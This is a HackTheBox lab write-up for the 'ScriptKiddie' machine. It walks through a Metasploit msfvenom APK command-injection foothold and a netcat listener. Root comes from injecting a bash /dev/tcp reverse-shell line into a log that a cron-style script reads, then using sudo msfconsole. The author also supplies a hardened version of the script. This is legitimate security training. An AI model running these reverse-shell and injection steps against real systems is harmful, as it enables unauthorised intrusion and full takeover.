
HackTheBox - ScriptKiddie

This box was the first live box I've managed to root, utilising Metasploit to gain a foothold and then writing a bash reverse shell into a file to elevate privileges, gaining root.

Key takeaways:

  • Template command injection using metasploit
  • Identifying and understanding vulnerabilities in bash scripts
  • Writing a reverse shell bash script into target file

Machine IP = 10.10.10.226

Enumeration

First things first, start out with an nmap scan of the host.

nmap -sV -sC -T 5 10.10.10.226

─$ nmap -sV -sC -T 5 10.10.10.226                                                                          130 ⨯
Starting Nmap 7.91 ( https://nmap.org ) at 2021-04-28 08:59 EDT
Nmap scan report for 10.10.10.226
Host is up (0.031s latency).
Not shown: 998 closed ports
PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 3c:65:6b:c2:df:b9:9d:62:74:27:a7:b8:a9:d3:25:2c (RSA)
|   256 b9:a1:78:5d:3c:1b:25:e0:3c:ef:67:8d:71:d3:a3:ec (ECDSA)
|_  256 8b:cf:41:82:c6:ac:ef:91:80:37:7c:c9:45:11:e8:43 (ED25519)
5000/tcp open  http    Werkzeug httpd 0.16.1 (Python 3.8.5)
|_http-server-header: Werkzeug/0.16.1 Python/3.8.5
|_http-title: k1d'5 h4ck3r t00l5
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 7.84 seconds

As we can see, we have SSH on port 22 and a web server on port 5000 titled “k1d’5 h4ck3r t00l5”. Let's take a look:

[Screenshot: the website]

Initial thoughts are pointing me towards the file upload button; maybe we can upload a reverse shell?


Foothold

After playing around with the site and googling Linux template file upload vulnerabilities, I came across a Metasploit module on Rapid7:

Rapid 7 - msfvenom apk cmd injection

It outlines the steps as follows:

msf > use exploit/unix/fileformat/metasploit_msfvenom_apk_template_cmd_injection
msf exploit(metasploit_msfvenom_apk_template_cmd_injection) > show targets
    ...targets...
msf exploit(metasploit_msfvenom_apk_template_cmd_injection) > set TARGET < target-id >
msf exploit(metasploit_msfvenom_apk_template_cmd_injection) > show options
    ...show and set options...
msf exploit(metasploit_msfvenom_apk_template_cmd_injection) > exploit

Where the options are set as follows (LHOST/LPORT are our own listener):

  • RHOSTS = 10.10.10.226
  • RPORT = 5000
  • LHOST = 10.10.14.15
  • LPORT = 5555

Running this module produced an APK containing a reverse shell, called msf.apk. As APKs are application packages for Android devices, we can try the site's Android OS option. Let's upload this to the web server and have it connect back to our machine.

Getting a shell

First, let's start our netcat listener on our host machine:

nc -nvlp 5555

┌──(kali㉿kali)-[~/Desktop]
└─$ nc -nvlp 5555                 
listening on [any] 5555 ...

and then upload the APK to the target machine via the website, with the OS set to Android, and press generate.

┌──(kali㉿kali)-[~/Desktop]
└─$ nc -nvlp 5555                                                                                             
listening on [any] 5555 ...
connect to [10.10.14.15] from (UNKNOWN) [10.10.10.226] 50388
whoami
kid

Boom! We have a reverse shell! Now let's upgrade it to an interactive shell using

python3 -c 'import pty; pty.spawn("/bin/bash")'

┌──(kali㉿kali)-[~/Desktop]
└─$ nc -nvlp 5555                                                                                             1 ⨯
listening on [any] 5555 ...
connect to [10.10.14.15] from (UNKNOWN) [10.10.10.226] 50392
whoami
kid
python3 -c 'import pty; pty.spawn("/bin/bash")'
kid@scriptkiddie:~/html$ 

User.txt

Some quick searching led to the first flag:

kid@scriptkiddie:~$ more user.txt
more user.txt
***d05c9b66325f22*a4c59c75c*7a03

Privilege Escalation

Looking around, it seems there is another user, pwn. In their home directory is a file called scanlosers.sh. Let's take a look:

kid@scriptkiddie:/home/pwn$ cat scanlosers.sh
cat scanlosers.sh
#!/bin/bash

log=/home/kid/logs/hackers

cd /home/pwn/
cat $log | cut -d' ' -f3- | sort -u | while read ip; do
    sh -c "nmap --top-ports 10 -oN recon/${ip}.nmap ${ip} 2>&1 >/dev/null" &
done

if [[ $(wc -l < $log) -gt 0 ]]; then echo -n > $log; fi

It looks as though the script is being run continuously: it reads every line of the hackers log, takes everything from the third space-separated field onward as an IP, splices that value straight into the command string handed to sh -c, runs nmap against it in the background, and then empties the log. Because the value is never validated before it reaches sh -c, any shell metacharacters in the log are executed as the script's user. Maybe we can write a shell to the file?

After lots of trial and syntax errors, I finally got a shell using the following:

echo " ;/bin/bash -c 'bash -i >& /dev/tcp/10.10.14.15/1234 0>&1' #" > hackers

The ; terminates the nmap command that our text is spliced into (it lands inside the -oN recon/${ip}.nmap argument), and the # comments out everything after our command. Note that the script's cut -d' ' -f3- discards the first two space-separated fields of each line, so the injected command only takes effect once it sits at the third field or later; leading spaces count as field separators here.
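As an added example, not the box's own script, here is a hardened rewrite of the scanlosers.sh loop that closes this injection. It assumes the log keeps the layout implied by the original's cut -d' ' -f3- (two leading fields, then the entry), and the function names is_ipv4, extract_targets and scan_log are my own. Every entry is validated as a plain IPv4 address, and nmap is called with a quoted argument list rather than through sh -c.

```shell
#!/bin/sh
# Hardened rewrite of the scanlosers.sh loop (added example, not the
# box's script). The original splices a log-controlled value into
# `sh -c "nmap ... ${ip}"`, so shell metacharacters in the log run as
# the pwn user. Fix: validate each entry, and never build a shell string.

# Return 0 only for a dotted-quad IPv4 address with octets 0-255.
is_ipv4() {
    case $1 in
        ''|*[!0-9.]*|.*|*.|*..*) return 1 ;;
    esac
    old_ifs=$IFS; IFS=.
    set -- $1        # split on dots into positional parameters
    IFS=$old_ifs
    [ $# -eq 4 ] || return 1
    for o in "$@"; do
        [ "${#o}" -le 3 ] && [ "$o" -le 255 ] || return 1
    done
    return 0
}

# Read log lines on stdin (assumed layout: two leading fields, then the
# entry, matching the original's cut). Print validated, de-duplicated
# targets; report anything else to stderr instead of passing it on.
extract_targets() {
    cut -d' ' -f3- | sort -u | while IFS= read -r entry; do
        if is_ipv4 "$entry"; then
            printf '%s\n' "$entry"
        else
            printf 'scanlosers: rejected non-IP entry: %s\n' "$entry" >&2
        fi
    done
}

# Scan each validated target. "$ip" reaches nmap as a single argument,
# so it can never be parsed as shell syntax.
scan_log() {
    log=${1:-/home/kid/logs/hackers}    # path from the original script
    [ -s "$log" ] || return 0
    extract_targets < "$log" | while IFS= read -r ip; do
        nmap --top-ports 10 -oN "recon/$ip.nmap" "$ip" >/dev/null 2>&1 &
    done
    : > "$log"                          # empty the log, as the original does
}

# Constructed sample log: two scan requests and one injection attempt.
SAMPLE_LOG='[2021-04-28 09:00:00] 10.10.10.226
[2021-04-28 09:00:01] 10.10.14.15
[2021-04-28 09:00:02] ;id #'
printf '%s\n' "$SAMPLE_LOG" | extract_targets
```

Run stand-alone, the last line prints the two valid addresses and reports the ;id # entry on stderr without ever handing it to a shell.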

┌──(kali㉿kali)-[~/Desktop]
└─$ nc -nvlp 1234                                                                                             
listening on [any] 1234 ...
connect to [10.10.14.15] from (UNKNOWN) [10.10.10.226] 33360
bash: cannot set terminal process group (870): Inappropriate ioctl for device
bash: no job control in this shell
pwn@scriptkiddie:~$ whoami
whoami
pwn

Great! Let's see what commands pwn can run with sudo:

sudo -l

pwn@scriptkiddie:~$ sudo -l
sudo -l
Matching Defaults entries for pwn on scriptkiddie:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User pwn may run the following commands on scriptkiddie:
    (root) NOPASSWD: /opt/metasploit-framework-6.0.9/msfconsole

It looks as though pwn can run msfconsole as root with no password needed. msfconsole hands commands it doesn't recognise to the system shell (the [*] exec: line below), so running whoami inside it confirms we are root:

msf6 > whoami
[*] exec: whoami

root

Root.txt

msf6 > cat root.txt
[*] exec: cat root.txt

***31120548006c2e8fc52d912365797
This post is licensed under CC BY 4.0 by the author.